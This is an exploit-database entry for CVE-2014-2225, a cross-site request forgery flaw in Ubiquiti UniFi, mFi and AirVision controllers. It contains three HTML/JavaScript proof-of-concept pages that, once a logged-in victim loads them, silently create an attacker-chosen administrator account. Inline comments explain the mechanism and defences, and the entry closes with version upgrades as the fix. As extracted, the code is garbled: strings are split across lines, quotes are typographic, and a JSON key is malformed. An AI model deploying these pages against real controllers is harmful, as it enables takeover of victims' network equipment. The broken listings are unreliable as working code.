Ubiquiti UbiFi / mFi / AirVision – Cross-Site Request Forgery

  • 作者: Seth Art
    日期: 2014-07-28
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/34187/
  • # Vendor Homepage: (http://www.ubnt.com/)
    
    # Tested on: Kali Linux
    -----------------------------------------
    Affected Products/Versions:
    -----------------------------------------
    UniFi Controller v2.4.6
    mFi Controller v2.0.15
    AirVision Controller v2.1.3
    Note: Previous versions may be affected
    
    
    -----------------
    Description:
    -----------------
    Title: Cross-site Request Forgery (CSRF)
    CVE: CVE-2014-2225
    CWE: http://cwe.mitre.org/data/definitions/352.html
    
    
    Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2225.html
    Researcher: Seth Art - @sethsec
    
    ---------------
    UniFi POC:
    
    ---------------
    
    <html>
    <!-- UniFi Controller proof of concept for CVE-2014-2225 (CSRF, CWE-352).
         A browser that holds a controller session and loads this page is made
         to issue a credentialed cross-origin POST to the admin-creation
         endpoint.  Nothing in the request is secret to the attacker page, so
         the controller cannot distinguish it from a request made by its own
         UI.  The listing as extracted here is garbled (see the notes inside)
         and does not run unmodified. -->
    <head>
    <script>
    // Builds and sends the forged request; triggered by the onload attribute
    // on the second <body> tag further down.
    function sendCSRF()
    {
    // Admin-creation endpoint of the controller.  The host/port are the
    // researcher's lab address (see "Tested on" above), not a fixed value.
    var url_base = "https://192.168.0.106:8443/api/add/admin"
    
    // URL-encoded form of {"name":"csrf","lang":"en_US","x_password":"csrf"}:
    // the administrator account the request tries to create.
    var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
    
    var xmlhttp;
    xmlhttp = new XMLHttpRequest();
    xmlhttp.open("POST", url_base, true);
    xmlhttp.setRequestHeader("Accept","*/*");
    // NOTE(extraction): the header value below is split across lines; in the
    // original it is a single line.  The form-urlencoded content type is what
    // lets a browser send this as a CORS "simple" request (no preflight) even
    // though the body is JSON.  A server that required application/json, or
    // a custom request header, would force a preflight and block this path.
    xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;
    
    
    charset=UTF-8");
    // Attach the victim's cookies to the cross-origin request.  The string
    // "true" is merely truthy; the boolean true is the conventional value.
    xmlhttp.withCredentials= "true";
    xmlhttp.send(post_data);
    }
    
    </script>
    </head>
    <body>
    <h1>CSRF POC</h1>
    Sending CSRF Payload!!!
    
    <!-- Second <body> start tag (the first is just above); its onload is what
         fires sendCSRF().  Defence on the server side: bind state-changing
         API calls to a per-session anti-CSRF token, require a content type or
         custom header that forces a CORS preflight, and set SameSite on the
         session cookie where the platform supports it. -->
    <body onload="sendCSRF()">
    
    </body>
    
    -------------
    mFi POC:
    -------------
    <html>
    <!-- mFi Controller proof of concept for CVE-2014-2225.  Same construction
         as the UniFi page above: a credentialed cross-origin POST to the
         controller's admin-creation API from a page the victim merely visits.
         Only the port (6443) and the versioned API path differ.  As extracted
         here the script is garbled and does not run unmodified. -->
    <head>
    <script>
    // Builds and sends the forged request; invoked from the onload attribute
    // on the second <body> tag below.
    function sendCSRF()
    {
    // Admin-creation endpoint (mFi uses a versioned path).  The address is
    // the researcher's lab host, not a fixed value.
    var url_base = "https://192.168.0.106:6443/api/v1.0/add/admin"
    
    
    // URL-encoded form of {"name":"csrf","lang":"en_US","x_password":"csrf"}.
    var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
    
    var xmlhttp;
    xmlhttp = new XMLHttpRequest();
    xmlhttp.open("POST", url_base, true);
    
    
    xmlhttp.setRequestHeader("Accept","*/*");
    // NOTE(extraction): this header value is broken across two lines here and
    // is one line in the original.  Accepting a JSON body under a
    // form-urlencoded content type is the server-side weakness that makes the
    // request forgeable without a preflight.
    xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;
    charset=UTF-8");
    // Send the victim's session cookies with the request ("true" is truthy;
    // the boolean true is the usual value).
    xmlhttp.withCredentials= "true";
    
    
    xmlhttp.send(post_data);
    }
    
    </script>
    </head>
    <body>
    <h1>CSRF POC</h1>
    Sending CSRF Payload!!!
    <!-- Duplicate <body> start tag; its onload triggers sendCSRF().  The fix
         is the same as for UniFi: anti-CSRF tokens on state-changing calls,
         a strict content type or custom header, and SameSite cookies. -->
    <body onload="sendCSRF()">
    </body>
    
    
    
    --------------------
    
    AirVision POC:
    --------------------
    <html>
    <!-- AirVision Controller proof of concept for CVE-2014-2225.  Same idea as
         the two pages above: a page the victim visits issues a credentialed
         cross-origin POST that creates an administrator.  This variant posts
         a raw JSON body to a different admin endpoint (port 7443).  As
         extracted here the listing is heavily garbled (see the notes inside)
         and does not run unmodified. -->
    <head>
    <script>
    // Builds and sends the forged request; invoked from the onload attribute
    // on the second <body> tag below.
    function sendCSRF()
    {
    // Admin endpoint of the AirVision API.  Address is the researcher's lab
    // host, not a fixed value.
    var url_base = "https://192.168.0.106:7443/api/v2.0/admin"
    
    
    // JSON body for the new account: name, email, userGroup, x_password,
    // confirmPassword, disabled.  NOTE(extraction): the quotes are typographic
    // (U+201D) rather than ASCII, so the literal never terminates as written;
    // the original most likely used plain quotes.  The key written as
    // "userGroup:" carries a stray colon, reproduced here as found.
    var post_data="{\”name\”:\”csrf\”,\”email\”:\”csrf@gmail.com\”,\”userGroup:\”:\”admin\”,\”x_password\”:\”password\”,\”confirmPassword\”:\”password\”,\”disabled\”:\”false\”}”
    
    
    var xmlhttp;
    xmlhttp = new XMLHttpRequest();
    xmlhttp.open("POST", url_base, true);
    xmlhttp.setRequestHeader("Accept","*/*");
    // "application/plain" is not a registered media type (text/plain is);
    // whether the controller accepted it, or whether this is a transcription
    // error, is not shown on this page.
    xmlhttp.setRequestHeader("Content-type","application/plain; charset=UTF-8");
    
    
    // Send the victim's session cookies with the request ("true" is truthy;
    // the boolean true is the usual value).
    xmlhttp.withCredentials= "true";
    xmlhttp.send(post_data);
    }
    
    </script>
    </head>
    <body>
    <h1>CSRF POC</h1>
    Sending CSRF Payload!!!
    <!-- Duplicate <body> start tag; its onload triggers sendCSRF().
         Mitigation is the same as for the other controllers: per-session
         anti-CSRF tokens, a strict content type or custom header on
         state-changing calls, and SameSite session cookies. -->
    <body onload="sendCSRF()">
    
    
    </body>
    
    
    
    -------------
    Solution:
    -------------
    UniFi Controller - Upgrade to UniFi Controller v3.2.1 or greater
    mFi Controller - Upgrade to mFi Controller v2.0.24 or greater
    AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note: the application name changed from AirVision to UniFi Video)